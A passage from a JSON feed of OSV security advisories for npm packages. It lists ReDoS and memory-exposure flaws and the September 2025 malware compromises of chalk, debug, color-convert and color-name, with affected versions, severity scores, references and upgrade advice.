], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4068" }, { "type": "WEB", "url": "https://github.com/micromatch/braces/issues/35" }, { "type": "WEB", "url": "https://github.com/micromatch/braces/pull/37" }, { "type": "WEB", "url": "https://github.com/micromatch/braces/pull/40" }, { "type": "WEB", "url": "https://github.com/micromatch/braces/commit/415d660c3002d1ab7e63dbf490c9851da80596ff" }, { "type": "WEB", "url": "https://devhub.checkmarx.com/cve-details/CVE-2024-4068" }, { "type": "PACKAGE", "url": "https://github.com/micromatch/braces" }, { "type": "WEB", "url": "https://github.com/micromatch/braces/blob/98414f9f1fabe021736e26836d8306d5de747e0d/lib/parse.js#L308" } ], "database_specific": { "cwe_ids": [ "CWE-1050", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2024-06-10T20:17:26Z", "nvd_published_at": "2024-05-14T15:42:48Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-w8qv-6jwh-64r5", "published": "2021-05-24T19:52:40Z", "modified": "2025-01-14T08:57:17.283480Z", "aliases": [ "CVE-2021-23364" ], "summary": "Regular Expression Denial of Service in browserslist", "details": "The package browserslist from 4.0.0 and before 4.16.5 are vulnerable to Regular Expression Denial of Service (ReDoS) during parsing of queries.", "affected": [ { "package": { "name": "browserslist", "ecosystem": "npm", "purl": "pkg:npm/browserslist" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.16.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-w8qv-6jwh-64r5/GHSA-w8qv-6jwh-64r5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23364" }, { "type": "WEB", "url": "https://github.com/browserslist/browserslist/pull/593" }, { "type": "WEB", "url": "https://github.com/browserslist/browserslist/commit/c091916910dfe0b5fd61caad96083c6709b02d98" }, { "type": "WEB", "url": "https://github.com/browserslist/browserslist/blob/e82f32d1d4100d6bc79ea0b6b6a2d281a561e33c/index.js%23L472-L474" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1277182" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-BROWSERSLIST-1090194" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-05-20T22:03:36Z", "nvd_published_at": "2021-04-28T16:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46969", "published": "2025-09-08T17:11:19Z", "modified": "2025-09-12T01:13:34Z", "aliases": [ "GHSA-2v46-p5h4-248w" ], "summary": "Malicious code in chalk (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: ghsa-malware (985b6546ed08c8482326a4819faec318c27c1f6d7518acdf384d5f5a8c1453aa)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "chalk", "ecosystem": "npm", "purl": "pkg:npm/chalk" }, "versions": [ "5.6.1" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chalk/MAL-2025-46969.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-2v46-p5h4-248w" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-2v46-p5h4-248w", "import_time": "2025-09-09T00:35:48.404674353Z", "modified_time": "2025-09-08T18:23:16Z", "sha256": "985b6546ed08c8482326a4819faec318c27c1f6d7518acdf384d5f5a8c1453aa", "source": "ghsa-malware", "versions": [ "5.6.1" ] }, { "id": "GHSA-2v46-p5h4-248w", "import_time": "2025-09-10T00:34:05.214580215Z", "modified_time": "2025-09-08T18:23:16Z", "sha256": "9e4e6ffb9078f031d148a99152d1a63bffe9c267f969ac88d6d9b355cd8d211c", "source": "ghsa-malware", "versions": [ "5.6.1" ] }, { "id": "GHSA-2v46-p5h4-248w", "import_time": "2025-09-11T00:34:35.448176777Z", "modified_time": "2025-09-10T17:52:52Z", "sha256": "64c35cc6f93b797f929d31b27a664a0a23481218c1ed47a374c7d38ccf30a663", "source": "ghsa-malware", "versions": [ "5.6.1" ] }, { "id": "GHSA-2v46-p5h4-248w", "import_time": "2025-09-12T00:33:58.009713106Z", "modified_time": "2025-09-10T17:52:52Z", "sha256": "51098385745159b51bf05a6f6a1082961f4598d6f9ae81f34430ecbb9c9faffb", "source": "ghsa-malware", "versions": [ "5.6.1" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wxhq-pm8v-cw75", "published": "2019-06-05T20:50:16Z", "modified": "2020-08-31T18:35:40Z", "summary": "Regular Expression Denial of Service in clean-css", "details": "Version of `clean-css` prior to 4.1.11 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. This can cause the application to be unresponsive leading to Denial of Service.\n\n\n## Recommendation\n\nUpgrade to version 4.1.11 or higher.", "affected": [ { "package": { "name": "clean-css", "ecosystem": "npm", "purl": "pkg:npm/clean-css" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.1.11" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-wxhq-pm8v-cw75/GHSA-wxhq-pm8v-cw75.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/jakubpawlowicz/clean-css/commit/2929bafbf8cdf7dccb24e0949c70833764fa87e3" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/785" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2019-06-05T20:49:47Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.7.3", "id": "GHSA-pxx3-g568-hxr4", "published": "2025-09-15T23:32:36Z", "modified": "2025-09-16T06:44:36.975424Z", "aliases": [ "CVE-2025-59162", "GHSA-ch7m-m9rf-8gvv", "MAL-2025-46971" ], "summary": "color-convert@3.1.1 contains malware after npm account takeover", "details": "### Impact\nOn 8 September 2025, the npm publishing account for `color-convert` was taken over after a phishing attack. Version `3.1.1` was published, functionally identical to the previous patch version, but with a malware payload added attempting to redirect cryptocurrency transactions to the attacker's own addresses from within browser environments.\n\nLocal environments, server environments, command line applications, etc. are not affected. If the package was used in a browser context (e.g. a direct `\u003cscript\u003e` inclusion, or via a bundling tool such as Babel, Rollup, Vite, Next.js, etc.) there is a chance the malware still exists and such bundles will need to be rebuilt.\n\nThe malware seemingly only targets cryptocurrency transactions and wallets such as MetaMask. See references below for more information on the payload.\n\n### Patches\nnpm removed the offending package from the registry over the course of the day on 8 September, preventing further downloads from npm proper.\n\nOn 13 September, the package owner published new patch versions to help cache-bust those using private registries who might still have the compromised version cached. This version is functionally identical to the previously known-good version, published as a patch version bump above the compromised version.\n\nUsers should update to the latest patch version, completely remove their `node_modules` directory, clean their package manager's global cache, and rebuild any browser bundles from scratch.\n\nThose operating private registries or registry mirrors should purge the offending versions from any caches.\n\n### References\n- https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised\n- https://socket.dev/blog/npm-author-qix-compromised-in-major-supply-chain-attack\n- https://www.ox.security/blog/npm-packages-compromised/\n\n### Point of Contact\nIn the event suspicious behavior is still observed for the package listed in this security advisory after performing all of the above cleaning operations (see _Patches_ above), please reach out via one of the following channels of communication:\n\n- Bluesky, package owner: https://bsky.app/profile/bad-at-computer.bsky.social\n- `debug` repository, tracking issue (applies to all packages affected in the breach): https://github.com/debug-js/debug/issues/1005", "affected": [ { "package": { "name": "color-convert", "ecosystem": "npm", "purl": "pkg:npm/color-convert" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.1.1" }, { "fixed": "3.1.2" } ] } ], "versions": [ "3.1.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-pxx3-g568-hxr4/GHSA-pxx3-g568-hxr4.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/Qix-/color-convert/security/advisories/GHSA-pxx3-g568-hxr4" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59162" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/issues/1005" }, { "type": "PACKAGE", "url": "https://github.com/Qix-/color-convert" }, { "type": "WEB", "url": "https://socket.dev/blog/npm-author-qix-compromised-in-major-supply-chain-attack" }, { "type": "WEB", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "WEB", "url": "https://www.ox.security/blog/npm-packages-compromised" } ], "database_specific": { "cwe_ids": [ "CWE-506" ], "github_reviewed": true, "github_reviewed_at": "2025-09-15T23:32:36Z", "nvd_published_at": "2025-09-15T20:15:39Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:A/U:Red" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46971", "published": "2025-09-08T15:20:15Z", "modified": "2025-09-16T06:44:36.975424Z", "aliases": [ "CVE-2025-59162", "GHSA-ch7m-m9rf-8gvv", "GHSA-pxx3-g568-hxr4" ], "summary": "Malicious code in color-convert (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: ghsa-malware (71ee3370ed9cf22bf89fbf40c954408a6ddcd17fbd38750027a2b7fab6034bce)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "color-convert", "ecosystem": "npm", "purl": "pkg:npm/color-convert" }, "versions": [ "3.1.1" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/color-convert/MAL-2025-46971.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/issues/6099" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-ch7m-m9rf-8gvv" }, { "type": "WEB", "url": "https://github.com/Qix-/color-convert/security/advisories/GHSA-pxx3-g568-hxr4" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-ch7m-m9rf-8gvv", "import_time": "2025-09-09T00:35:48.409407322Z", "modified_time": "2025-09-08T17:56:12Z", "sha256": "71ee3370ed9cf22bf89fbf40c954408a6ddcd17fbd38750027a2b7fab6034bce", "source": "ghsa-malware", "versions": [ "3.1.1" ] }, { "id": "GHSA-ch7m-m9rf-8gvv", "import_time": "2025-09-10T00:34:05.222333023Z", "modified_time": "2025-09-08T17:56:12Z", "sha256": "ee95040e7382c445c5a1de4f66c3aed2bd1c73e1c57e6c1f771a7533ede4f69f", "source": "ghsa-malware", "versions": [ "3.1.1" ] }, { "id": "GHSA-ch7m-m9rf-8gvv", "import_time": "2025-09-11T00:34:35.466556711Z", "modified_time": "2025-09-10T17:52:03Z", "sha256": "1e49d335bbdf3413c7efa2126f2e06bb7533e83ab6f365d579dbe20b0ae30be9", "source": "ghsa-malware", "versions": [ "3.1.1" ] }, { "id": "GHSA-ch7m-m9rf-8gvv", "import_time": "2025-09-12T00:33:58.055781098Z", "modified_time": "2025-09-10T17:52:03Z", "sha256": "36c2dcaa1b9cf1e9b5ec230c48ee34687bbd9bea0c1f91efbfbf650557267927", "source": "ghsa-malware", "versions": [ "3.1.1" ] }, { "id": "GHSA-ch7m-m9rf-8gvv", "import_time": "2025-09-16T00:34:25.618299208Z", "modified_time": "2025-09-15T23:53:52Z", "sha256": "b4461cfdaf22dc82a9f42a461cfb5010106609d3e678ca21a5ec688a726ccabd", "source": "ghsa-malware", "versions": [ "3.1.1" ] }, { "id": "GHSA-ch7m-m9rf-8gvv", "import_time": "2025-09-17T00:07:09.294375031Z", "modified_time": "2025-09-15T23:53:52Z", "sha256": "38db2d19b1ffae2a528090f28216d7c84e2ab97ed2867873e8e2bce73367dd1d", "source": "ghsa-malware", "versions": [ "3.1.1" ] }, { "id": "GHSA-ch7m-m9rf-8gvv", "import_time": "2025-09-17T00:34:59.136200926Z", "modified_time": "2025-09-15T23:53:52Z", "sha256": "801c40de46a1c5af84767ee6b828fad2b331674b3430948a4f75bda351040f8f", "source": "ghsa-malware", "versions": [ "3.1.1" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5fvm-p68v-5wmh", "published": "2025-09-15T22:03:28Z", "modified": "2025-09-16T06:44:30.196915Z", "aliases": [ "CVE-2025-59145", "GHSA-m99c-cfww-cxqx", "MAL-2025-46972" ], "summary": "color-name@2.0.1 contains malware after npm account takeover", "details": "### Impact\nOn 8 September 2025, an npm publishing account for `color-name` was taken over after a phishing attack. Version `2.0.1` was published, functionally identical to the previous patch version, but with a malware payload added attempting to redirect cryptocurrency transactions to the attacker's own addresses from within browser environments.\n\nLocal environments, server environments, command line applications, etc. are not affected. If the package was used in a browser context (e.g. a direct `\u003cscript\u003e` inclusion, or via a bundling tool such as Babel, Rollup, Vite, Next.js, etc.) there is a chance the malware still exists and such bundles will need to be rebuilt.\n\nThe malware seemingly only targets cryptocurrency transactions and wallets such as MetaMask. See references below for more information on the payload.\n\n### Patches\nnpm removed the offending package from the registry over the course of the day on 8 September, preventing further downloads from npm proper.\n\nOn 13 September, the package owner published new patch versions to help cache-bust those using private registries who might still have the compromised version cached. This version is functionally identical to the previously known-good version, published as a patch version bump above the compromised version.\n\nUsers should update to the latest patch version, completely remove their `node_modules` directory, clean their package manager's global cache, and rebuild any browser bundles from scratch.\n\nThose operating private registries or registry mirrors should purge the offending versions from any caches.\n\n### Resources\n- https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised\n- https://socket.dev/blog/npm-author-qix-compromised-in-major-supply-chain-attack\n- https://www.ox.security/blog/npm-packages-compromised/\n\n### Point of Contact\nIn the event suspicious behavior is still observed for the package listed in this security advisory after performing all of the above cleaning operations (see _Patches_ above), please reach out via one of the following channels of communication:\n\n- Bluesky, compromised publishing account owner: https://bsky.app/profile/bad-at-computer.bsky.social\n- `debug` repository, tracking issue (applies to all packages affected in the breach): https://github.com/debug-js/debug/issues/1005", "affected": [ { "package": { "name": "color-name", "ecosystem": "npm", "purl": "pkg:npm/color-name" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.0.1" }, { "fixed": "2.0.2" } ] } ], "versions": [ "2.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-5fvm-p68v-5wmh/GHSA-5fvm-p68v-5wmh.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/colorjs/color-name/security/advisories/GHSA-5fvm-p68v-5wmh" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59145" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/issues/1005" }, { "type": "PACKAGE", "url": "https://github.com/colorjs/color-name" }, { "type": "WEB", "url": "https://socket.dev/blog/npm-author-qix-compromised-in-major-supply-chain-attack" }, { "type": "WEB", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "WEB", "url": "https://www.ox.security/blog/npm-packages-compromised" } ], "database_specific": { "cwe_ids": [ "CWE-506" ], "github_reviewed": true, "github_reviewed_at": "2025-09-15T22:03:28Z", "nvd_published_at": "2025-09-15T21:15:36Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:A/U:Red" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46972", "published": "2025-09-08T15:05:16Z", "modified": "2025-09-16T06:44:30.196915Z", "aliases": [ "CVE-2025-59145", "GHSA-5fvm-p68v-5wmh", "GHSA-m99c-cfww-cxqx" ], "summary": "Malicious code in color-name (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: ghsa-malware (ec95d0b2e67387181db7dbe2f93160248e40a3f6323ef1ee75b116f621ac5af1)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "color-name", "ecosystem": "npm", "purl": "pkg:npm/color-name" }, "versions": [ "2.0.1" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/color-name/MAL-2025-46972.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/issues/6099" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-m99c-cfww-cxqx" }, { "type": "WEB", "url": "https://github.com/colorjs/color-name/security/advisories/GHSA-5fvm-p68v-5wmh" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-m99c-cfww-cxqx", "import_time": "2025-09-09T00:35:48.415723474Z", "modified_time": "2025-09-08T18:02:51Z", "sha256": "ec95d0b2e67387181db7dbe2f93160248e40a3f6323ef1ee75b116f621ac5af1", "source": "ghsa-malware", "versions": [ "2.0.1" ] }, { "id": "GHSA-m99c-cfww-cxqx", "import_time": "2025-09-10T00:34:05.231153986Z", "modified_time": "2025-09-08T18:02:51Z", "sha256": "928233225e28998e4fe7121fe96ac87179542253c82b34e02a3bc10e5e49c922", "source": "ghsa-malware", "versions": [ "2.0.1" ] }, { "id": "GHSA-m99c-cfww-cxqx", "import_time": "2025-09-11T00:34:35.476356878Z", "modified_time": "2025-09-10T17:48:44Z", "sha256": "9c1bfc8bf637d2f2fe25386bba4164441b0432ed54331595e9e305d9e95e132a", "source": "ghsa-malware", "versions": [ "2.0.1" ] }, { "id": "GHSA-m99c-cfww-cxqx", "import_time": "2025-09-12T00:33:58.086126601Z", "modified_time": "2025-09-10T17:48:44Z", "sha256": "f2cc960d02e1a3cc2e1b07650f63addf01114600f7e7615bddb85a3bbd89cf4b", "source": "ghsa-malware", "versions": [ "2.0.1" ] }, { "id": "GHSA-m99c-cfww-cxqx", "import_time": "2025-09-16T00:34:25.640454724Z", "modified_time": "2025-09-15T23:56:12Z", "sha256": "b3b6aa6b1f5d027c077a05ae6b1071b92f602f0e2261ef295c2e64f73d437596", "source": "ghsa-malware", "versions": [ "2.0.1" ] }, { "id": "GHSA-m99c-cfww-cxqx", "import_time": "2025-09-17T00:07:09.351618297Z", "modified_time": "2025-09-15T23:56:12Z", "sha256": "67cc1bbf808d890c505325e050d1996eb83ff0ae161bfe6aab545da645e58aaf", "source": "ghsa-malware", "versions": [ "2.0.1" ] }, { "id": "GHSA-m99c-cfww-cxqx", "import_time": "2025-09-17T00:34:59.207984541Z", "modified_time": "2025-09-15T23:56:12Z", "sha256": "d4d3f83b21a80fbd745a6085a0ca1a103b9648524da94ebe8d8c21d30e86e607", "source": "ghsa-malware", "versions": [ "2.0.1" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g74r-ffvr-5q9f", "published": "2019-06-03T17:26:44Z", "modified": "2020-08-31T18:29:17Z", "summary": "Memory Exposure in concat-stream", "details": "Versions of `concat-stream` before 1.5.2 are vulnerable to memory exposure if userp provided input is passed into `write()`\n\nVersions \u003c1.3.0 are not affected due to not using unguarded Buffer constructor.\n\n\n\n## Recommendation\n\nUpdate to version 1.5.2, 1.4.11, 1.3.2 or later.\n\nIf you are unable to update make sure user provided input into the `write()` function is not a number.", "affected": [ { "package": { "name": "concat-stream", "ecosystem": "npm", "purl": "pkg:npm/concat-stream" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.5.0" }, { "fixed": "1.5.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-g74r-ffvr-5q9f/GHSA-g74r-ffvr-5q9f.json" } }, { "package": { "name": "concat-stream", "ecosystem": "npm", "purl": "pkg:npm/concat-stream" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.4.0" }, { "fixed": "1.4.11" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-g74r-ffvr-5q9f/GHSA-g74r-ffvr-5q9f.json" } }, { "package": { "name": "concat-stream", "ecosystem": "npm", "purl": "pkg:npm/concat-stream" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.3.0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-g74r-ffvr-5q9f/GHSA-g74r-ffvr-5q9f.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/maxogden/concat-stream/pull/47" }, { "type": "WEB", "url": "https://github.com/maxogden/concat-stream/pull/47/commits/3e285ba5e5b10b7c98552217f5c1023829efe69e" }, { "type": "WEB", "url": "https://gist.github.com/ChALkeR/c2d2fd3f1d72d51ad883df195be03a85" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/597" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2019-06-03T17:26:24Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-3xgq-45jj-v275", "published": "2024-11-08T06:30:47Z", "modified": "2025-05-19T19:56:26Z", "aliases": [ "CVE-2024-21538" ], "related": [ "CGA-3wmj-q542-x56g", "CGA-49x5-fp72-pvgg", "CGA-56f7-wq2j-gqhc", "CGA-58mw-hm95-x9xv", "CGA-7c7p-r8cv-2pj4", "CGA-8hpc-g49m-34cc", "CGA-8j64-28x2-ggxv", "CGA-8rv2-6965-grc6", "CGA-m347-mh8c-rhf4" ], "summary": "Regular Expression Denial of Service (ReDoS) in cross-spawn", "details": "Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.", "affected": [ { "package": { "name": "cross-spawn", "ecosystem": "npm", "purl": "pkg:npm/cross-spawn" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-3xgq-45jj-v275/GHSA-3xgq-45jj-v275.json" } }, { "package": { "name": "cross-spawn", "ecosystem": "npm", "purl": "pkg:npm/cross-spawn" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "6.0.6" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-3xgq-45jj-v275/GHSA-3xgq-45jj-v275.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21538" }, { "type": "WEB", "url": "https://github.com/moxystudio/node-cross-spawn/issues/165" }, { "type": "WEB", "url": "https://github.com/moxystudio/node-cross-spawn/pull/160" }, { "type": "WEB", "url": "https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff" }, { "type": "WEB", "url": "https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f" }, { "type": "WEB", "url": "https://github.com/moxystudio/node-cross-spawn/commit/d35c865b877d2f9ded7c1ed87521c2fdb689c8dd" }, { "type": "PACKAGE", "url": "https://github.com/moxystudio/node-cross-spawn" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-8366349" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-CROSSSPAWN-8303230" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2024-11-15T22:25:53Z", "nvd_published_at": "2024-11-08T05:15:06Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" } ] }, { "schema_version": "1.7.3", "id": "GHSA-chwr-hf3w-c984", "published": "2021-05-10T18:44:38Z", "modified": "2023-11-08T04:04:08.690471Z", "aliases": [ "CVE-2020-7755" ], "summary": "Regular Expression Denial of Service in dat.gui", "details": "All versions of package dat.gui are vulnerable to Regular Expression Denial of Service (ReDoS) via specifically crafted rgb and rgba values.", "affected": [ { "package": { "name": "dat.gui", "ecosystem": "npm", "purl": "pkg:npm/dat.gui" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "last_affected": "0.7.7" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-chwr-hf3w-c984/GHSA-chwr-hf3w-c984.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7755" }, { "type": "WEB", "url": "https://github.com/dataarts/dat.gui/issues/278" }, { "type": "WEB", "url": "https://github.com/dataarts/dat.gui/pull/279" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-DATGUI-1016275" }, { "type": "WEB", "url": "https://www.npmjs.com/package/dat.gui" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-04-21T17:36:43Z", "nvd_published_at": "2020-10-27T18:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4x49-vf9v-38px", "published": "2025-09-15T21:30:55Z", "modified": "2025-09-16T06:44:36.384185Z", "aliases": [ "CVE-2025-59144", "GHSA-8mgj-vmr8-frr6", "MAL-2025-46974" ], "summary": "debug@4.4.2 contains malware after npm account takeover", "details": "### Impact\nOn 8 September 2025, the npm publishing account for `debug` was taken over after a phishing attack. Version `4.4.2` was published, functionally identical to the previous patch version, but with a malware payload added attempting to redirect cryptocurrency transactions to the attacker's own addresses from within browser environments.\n\nLocal environments, server environments, command line applications, etc. are not affected. If the package was used in a browser context (e.g. a direct `\u003cscript\u003e` inclusion, or via a bundling tool such as Babel, Rollup, Vite, Next.js, etc.) there is a chance the malware still exists and such bundles will need to be rebuilt.\n\nThe malware seemingly only targets cryptocurrency transactions and wallets such as MetaMask. See references below for more information on the payload.\n\n### Patches\nnpm removed the offending package from the registry over the course of the day on 8 September, preventing further downloads from npm proper.\n\nOn 13 September, the package owner published new patch versions to help cache-bust those using private registries who might still have the compromised version cached. This version is functionally identical to the previously known-good version, published as a patch version bump above the compromised version.\n\nUsers should upgrade to the latest patch version, completely remove their `node_modules` directory, clean their package manager's global cache, and rebuild any browser bundles from scratch.\n\nThose operating private registries or registry mirrors should purge the offending versions from any caches.\n\n### References\n- https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised\n- https://socket.dev/blog/npm-author-qix-compromised-in-major-supply-chain-attack\n- https://www.ox.security/blog/npm-packages-compromised/\n\n### Point of Contact\nIn the event suspicious behavior is still observed for the package listed in this security advisory after performing all of the above cleaning operations (see _Patches_ above), please reach out via one of the following channels of communication:\n\n- Bluesky, package owner: https://bsky.app/profile/bad-at-computer.bsky.social\n- `debug` repository, 